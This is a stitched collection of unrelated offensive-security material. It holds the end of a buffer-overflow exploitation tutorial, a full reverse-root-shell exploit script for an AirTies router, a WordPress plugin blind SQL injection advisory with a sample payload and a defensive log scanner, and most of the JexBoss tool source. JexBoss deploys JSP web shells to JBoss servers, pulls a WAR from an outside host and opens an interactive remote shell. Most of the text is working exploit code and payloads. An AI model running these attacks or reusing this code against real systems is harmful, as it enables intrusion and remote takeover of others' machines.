We use EXITFUNC=thread because otherwise, once we manage to exploit the buffer overflow and get a shell, if we lost it for whatever reason and wanted another one we couldn't get it, because the process would already have been killed. This way we can send ourselves as many shells as we want, since the shell processes run as threads and do not replace the main service process.

We copy the shellcode generated by msfvenom and add it to the exploit:

image 124
image 125

Finding an address with the JMP ESP opcode

With this part done, only one last step remains. We have to make EIP point to ESP, that is, to our payload, since right now it points to the address made up of the 4 'B's.

To do this, we have to make EIP point to a «JMP ESP» address: an address that automatically jumps to wherever ESP is.

For this we will use Metasploit's nasm_shell.rb tool together with mona.

nasm_shell.rb does the following:

image 126

This way, let's look at the opcode associated with JMP ESP:

image 127
image 128

Knowing that the opcode is FFE4, we go to mona and list the process's modules:

!mona modules

image 129

Listing the modules, we have to use one whose first four True/False columns are all False (since this BoF has no protections at all). In my case I am going to use the following module:

image 130

With this, we now use mona to look for an address inside that module whose opcode is a JMP ESP:

!mona find -s '"<JMP ESP opcode>"' -m <module>

!mona find -s '"\xff\xe4"' -m SLMFC.dll

image 131

Mona gives us a series of addresses, and we can pick any of them. The only requirement is that the address must not contain any badchar.

In my case, I will pick the last one, for example, 0x5f4c4d13.

Let's check that this address really is a JMP ESP.

Right-click and copy the address:

image 132

We go to the following button:

image 133

We paste the address and click OK. This takes us to the address we specified:

image 134

And indeed, we confirm it is a JMP ESP.

If doing this takes us to an address that has nothing to do with the one we entered, we simply search again and that's it.

Final exploit

We now have everything needed to exploit the buffer overflow successfully. Let's go to exploit.py for the final touches:

image 135

We replace the 4 'B's with the JMP ESP address in little endian:

image 136

In this case we use the struct library so that it does the conversion to «little endian» for us automatically. Doing it manually would also be valid.

Also, to make sure everything goes well, we add NOPs between the JMP ESP and the shellcode (we could also shift the stack if we didn't want to use NOPs):

image 137

If you don't know what NOPs are, you can read about them in the Stack-Based Buffer Overflow Fundamentals post.

With this, everything is ready: if we listen on the port we specified earlier in msfvenom and run the exploit:

image 138

We manage to control the program's flow, making it jump to our payload and giving us a shell.

#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT 
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: batuhan@bmicrosystems.com
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################

import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib


if __name__ == '__main__':

	try:
		ip = sys.argv[1]
		revhost = sys.argv[2]
		revport = sys.argv[3]
	except IndexError:
		print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]
		sys.exit(1)  # the original fell through here and then died on undefined names

	# reverse-shell host and port as integers, patched into the shellcode below
	host = struct.unpack('>L',socket.inet_aton(revhost))[0]
	port = string.atoi(revport)


	shellcode = ""
	shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd"
	shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff"
	shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0"
	shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
	shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1]
	shellcode += "\xaf\xae\xff\xe4"
	shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1]
	shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3]
	shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27"
	shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27"
	shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c"
	shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
	shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f"
	shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec"
	shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab"
	shellcode += "\x01\x01\x01\x0c"


	data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" 
	data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" 
	data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48

	pdata = {
		'redirect'		: data,
		'self'			: '1',
		'user'			: 'tanri',
		'password'		: 'ihtiyacmyok',
		'gonder'		: 'TAMAM'
		}

	login_data = urllib.urlencode(pdata)
	#print login_data

	url = 'http://%s/cgi-bin/login' % ip
	header = {}
	req = urllib2.Request(url, login_data, header)
	rsp = urllib2.urlopen(req)
            
# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/sp-client-document-manager
# Date: 2015-03-04
# Exploit Author: catsecurity
# Vendor Homepage: http://smartypantsplugins.com
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
# Version: version 2.5.3 and previous version
# Tested on: Chrome (It's PHP Application)
# CVE : N/A


# Timeline #
[2015.03.05] Reported to the Vendor
[2015.03.06?] Fixed in Update 2.5.4


# Details #

- The plugin does not validate its integer parameters. Unauthorized users can attack the websites that use this plugin.
- The vulnerable code is in the thumbnails() function in [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
- The "pid" variable is not sanitized.


# Vulnerable code #

ajax.php, lines 1132-1135:

        echo '<div id="dlg_cdm_thumbnails">';
        if ($_GET['pid'] != "") {
            $r_current_project = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu_project  WHERE id = " . $_GET['pid'] . "", ARRAY_A);
        }


# POC #
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]

example:
/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)

If the condition is true, the response is delayed by 5 seconds.


The vulnerable parameter must be cast to an integer.
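
Because the only legitimate shape of pid is an integer, the same rule can be used to spot abuse of this endpoint in web server access logs after the fact. The following is an added example written for this page, not the plugin's code: a Python 3 scan over constructed sample lines (assumed to be in Apache/nginx "combined" format) that flags requests to ajax.php?function=thumbnails whose pid is non-empty and not a plain integer; the server-side fix remains casting pid to an integer, as the advisory says.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter taken from the advisory; the plugin only ever means
# pid as an integer, so any other content is at best a broken client.
AJAX_PATH = "/wp-content/plugins/sp-client-document-manager/ajax.php"
INTEGER = re.compile(r"^[0-9]+$")

# Assumed "combined" log layout: client, identity, user, [time], "request", status.
LOG_LINE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                      r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
                      r'(?P<status>\d{3})')


def suspicious_pid(target):
    """Return the offending pid for a request that would reach the vulnerable
    query with a non-integer, else None. An empty pid is ignored because the
    vulnerable code skips it itself ($_GET['pid'] != "")."""
    parts = urlsplit(target)
    if not parts.path.endswith(AJAX_PATH):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("function", [""])[0] != "thumbnails":
        return None
    for pid in qs.get("pid", []):
        if pid and not INTEGER.match(pid):
            return pid
    return None


def scan_log(lines):
    """Return a list of (client, pid) for every line whose request carries a
    non-integer pid to the thumbnails function."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        pid = suspicious_pid(m.group("target"))
        if pid is not None:
            hits.append((m.group("client"), pid))
    return hits


# Constructed sample lines (not real traffic). The third carries the advisory's
# own time-based probe, percent-encoded the way a browser would send it.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Mar/2015:10:00:01 +0000] "GET /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=12 HTTP/1.1" 200 512',
    '203.0.113.5 - - [04/Mar/2015:10:00:02 +0000] "GET /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=upload&pid=abc HTTP/1.1" 200 80',
    '198.51.100.7 - - [04/Mar/2015:10:00:09 +0000] "GET /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database()%2C1%2C1)%3D0x61%2Csleep(5)%2C1) HTTP/1.1" 200 512',
    '198.51.100.7 - - [04/Mar/2015:10:00:20 +0000] "GET /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid= HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for client, pid in scan_log(SAMPLE_LOG):
        print("%s: non-integer pid %r" % (client, pid))
```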
            
# coding: utf-8
# JexBoss v1.0. @autor: João Filho Matos Figueiredo (joaomatosf@gmail.com)
# Updates: https://github.com/joaomatosf/jexboss
# Free for distribution and modification, but the authorship should be preserved.


import httplib, sys, urllib, os, time
from urllib import urlencode

RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'

def getHost(url):
	tokens = url.split("://")
	if len(tokens) == 2: # a scheme was supplied
		return tokens[1].split(":")[0]
	else:
		return tokens[0].split(":")[0] # no scheme: tokens is a one-element list, not a string
		
def getProtocol(url):
	tokens = url.split("://")
	if tokens[0] == "https":
		return "https"
	else:
		return "http"

def getPort(url):
	token = url[6:].split(":")
	if len(token) == 2:
		return token[1]
	elif getProtocol(url) == "https":
		return 443
	else:
		return 80
		
def getConnection(url):
	if getProtocol(url) == "https":
		return httplib.HTTPSConnection(getHost(url), getPort(url))
	else:
		return httplib.HTTPConnection(getHost(url), getPort(url))
		

def getSuccessfully(url, path):
		result = 404
		time.sleep(5)
		conn = getConnection(url)
		conn.request("GET", path)
		result = conn.getresponse().status
		if result == 404:
			conn.close()
			time.sleep(7)
			conn = getConnection(url)
			conn.request("GET", path)
			result = conn.getresponse().status
			conn.close()
		return result

def checkVul(url):
	
	print ( GREEN +" ** Checking Host: %s **\n" %url )
	
	path = { "jmx-console"		 : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
			 "web-console" 		 : "/web-console/ServerInfo.jsp",
			 "JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}

	for i in path.keys():
		try:
			print GREEN + " * Checking %s: \t" %i + ENDC,
			conn = getConnection(url)
			conn.request("HEAD", path[i])
			path[i] = conn.getresponse().status
			if path[i] == 200 or path[i] == 500:
				print RED + "[ VULNERABLE ]" + ENDC
			else: print GREEN + "[ OK ]"
			conn.close()
		except:
			print RED + "\n * An error occurred while contacting the host %s\n" %url + ENDC
			path[i] = 505
		
	return path

def autoExploit(url, type):
	
	# exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5
	# exploitJmxConsoleMainDeploy:	   tested and working in jboss 4 and 6
	# exploitWebConsoleInvoker:		   tested and working in jboss 4
	# exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5
	
	print GREEN + ("\n * Sending exploit code to %s. Wait...\n" %url)
	result = 505
	if type == "jmx-console":
		result = exploitJmxConsoleFileRepository(url)
		if result != 200 and result != 500:
			result = exploitJmxConsoleMainDeploy(url)
	elif type == "web-console":
		result = exploitWebConsoleInvoker(url)
	elif type == "JMXInvokerServlet":
		result = exploitJMXInvokerFileRepository(url)

	if result == 200 or result == 500:
		print GREEN + " * Successfully deployed code! Starting command shell, wait...\n" + ENDC
		shell_http(url, type)
	else:
		print (RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" 
				    "   Waiting for 7 seconds...\n "+ ENDC)
		time.sleep(7)

def shell_http(url, type):
	if type == "jmx-console" or type == "web-console":
		path = '/jbossass/jbossass.jsp?'
	elif type == "JMXInvokerServlet":
		path = '/shellinvoker/shellinvoker.jsp?'

	conn = getConnection(url)
	conn.request("GET", path)
	conn.close()
	time.sleep(7)
	resp = ""
	#clear()
	print " * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n"
	print RED+" * "+url+": \n"+ENDC
	headers = {"User-Agent" : "jexboss"}
	for cmd in ['uname -a', 'cat /etc/issue', 'id']:
		conn = getConnection(url)
		cmd = urlencode({"ppp": cmd})
		conn.request("GET", path+cmd, '', headers)
		resp += " "+conn.getresponse().read().split(">")[1]
	print resp,
	
	while 1:
		print BLUE + "[Type commands or \"exit\" to finish]"
		cmd=raw_input("Shell> "+ENDC)
		#print ENDC
		if cmd == "exit":
			break
		conn = getConnection(url)
		cmd = urlencode({"ppp": cmd})
		conn.request("GET", path+cmd, '', headers)
		resp = conn.getresponse()
		if resp.status == 404:
			print RED+ " * Error contacting the command shell. Try again later..."
			conn.close()
			continue
		stdout = ""
		try:
			stdout = resp.read().split("pre>")[1]
		except:
			print RED+ " * Error contacting the command shell. Try again later..."
		if stdout.count("An exception occurred processing JSP page") == 1:
			print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC
		else: print stdout,
		conn.close()

def exploitJmxConsoleMainDeploy(url):
	# MainDeployer
	# does not work in jboss5 (bug in jboss5)
	# shell in link
	# /jmx-console/HtmlAdaptor
	jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
	payload =(  "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"
				"=MainDeployer&methodIndex=19&arg0="+jsp)
	print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "
			       "\n   available on: "+jsp +ENDC)
	conn = getConnection(url)
	conn.request("HEAD", payload)
	result = conn.getresponse().status
	conn.close()
	return getSuccessfully(url, "/jbossass/jbossass.jsp")	

def exploitJmxConsoleFileRepository(url):
		# DeploymentFileRepository
		# tested and work in jboss4, 5.
		# doest not work in jboss6
		# shell jsp
		# /jmx-console/HtmlAdaptor
		jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"
			  "%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C"
			  "%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"
			  "%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20"
			  "%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65"
			  "%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71"
			  "%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72"
			  "%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74"
			  "%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73"
			  "%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29"
			  "%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69"
			  "%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65"
			  "%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29"
			  "%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E"
			  "%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64"
			  "%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70"
			  "%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20"
			  "%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )
			  
		payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
		           "DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
		           "jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St"
		           "ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True")
		
		conn = getConnection(url)
		conn.request("HEAD", payload)
		result = conn.getresponse().status
		conn.close()
		return getSuccessfully(url, "/jbossass/jbossass.jsp")
		
def exploitJMXInvokerFileRepository(url):
	# tested and work in jboss4, 5
	# MainDeploy, shell in data
	# /invoker/JMXInvokerServlet
	payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"
				"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"
				"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"
				"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"
				"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"
				"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"
				"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"
				"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"
				"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"
				"\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"
				"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"
				"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"
				"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"
				"\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"
				"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"
				"\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"
				"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"
				"\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"
				"\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"
				"\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"
				"\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"
				"\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"
				"\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"
				"\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"
				"\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"
				"\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"
				"\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"
				"\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
				"\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"
				"\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"
				"\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"
				"\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"
				"\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"
				"\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"
				"\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"
				"\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
				"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"
				"\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"
				"\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"
				"\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"
				"\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"
				"\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"
				"\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"
				"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"
				"\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"
				"\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"
				"\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"
				"\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"
				"\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"
				"\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"
				"\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"
				"\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"
				"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
				"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"
				"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
				"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"
				"\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"
				"\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"
				"\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"
				"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"
				"\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"
				"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"
				"\x00\x04\x70\x78")
	conn = getConnection(url)
	headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
				"Accept"  : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
	conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)
	response = conn.getresponse()
	result = response.status
	if result == 401:
		print "   Retrying..."
		conn.close()
		conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)
		response = conn.getresponse()
		result = response.status
	if response.read().count("Failed") > 0:
		result = 505
	conn.close()  # must be called, not just referenced
	return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")
	
def exploitWebConsoleInvoker(url):
	# does not work in jboss5 (bug in jboss5)
	# MainDeploy, shell in link
	# /web-console/Invoker
	#jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
	#jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)
	#jsp = "\\x" + jsp
	payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"
				"\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65"
				"\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e"
				"\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae"
				"\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61"
				"\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f"
				"\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73"
				"\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f"
				"\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75"
				"\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"
				"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65"
				"\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a"
				"\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f"
				"\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06"
				"\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61"
				"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58"
				"\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
				"\x2a"
				#link
				"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61"
				"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f"
				"\x73\x73\x61\x73\x73\x2e\x77\x61\x72"
				#end
				"\x75\x72\x00\x13\x5b"
				"\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e"
				"\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"
				"\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"
				"\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e"
				"\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63"
				"\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00"
				"\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"
				"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65"
				"\x70\x6c\x6f\x79\x65\x72\x78")
	conn = getConnection(url)
	headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
				"Accept"  : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
	conn.request("POST", "/web-console/Invoker", payload, headers)
	response = conn.getresponse()
	result = response.status
	if result == 401:
		print "   Retrying..."
		conn.close()
		conn.request("HEAD", "/web-console/Invoker", payload, headers)
		response = conn.getresponse()
		result = response.status
	conn.close()  # must be called, not just referenced
	return getSuccessfully(url, "/jbossass/jbossass.jsp")

	
def clear():
	if os.name == 'posix':
		os.system('clear')
	elif os.name in ('ce', 'nt', 'dos'):
		os.system('cls')

def checkArgs(args):
	if len(args) < 2 or args[1].count('.') < 1:
		return 1,"You must provide the host name or IP address you want to test."
	elif len(args[1].split('://')) == 1:
		return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1])
	elif args[1].count('http') == 1 and args[1].count('.') > 1:
		return 0, ""
	else:
		return 1, 'Parâmetro inválido'

def banner():
	clear()
	print (RED1+"\n * --- JexBoss: Jboss verify and EXploitation Tool  --- *\n"
  	          " |                                                      |\n"
              " | @author:  João Filho Matos Figueiredo                |\n"
              " | @contact: joaomatosf@gmail.com                       |\n"
	          " |                                                      |\n"
	          " | @update: https://github.com/joaomatosf/jexboss       |\n"
              " #______________________________________________________#\n\n" )

banner()
# check python version
if sys.version_info[0] == 3:
	print (RED + "\n * Not compatible with version 3 of python.\n"
				  "   Please run it with version 2.7 or lower.\n\n"
			+BLUE+" * Example:\n"
				  "   python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC )
	sys.exit(1)

# check Args
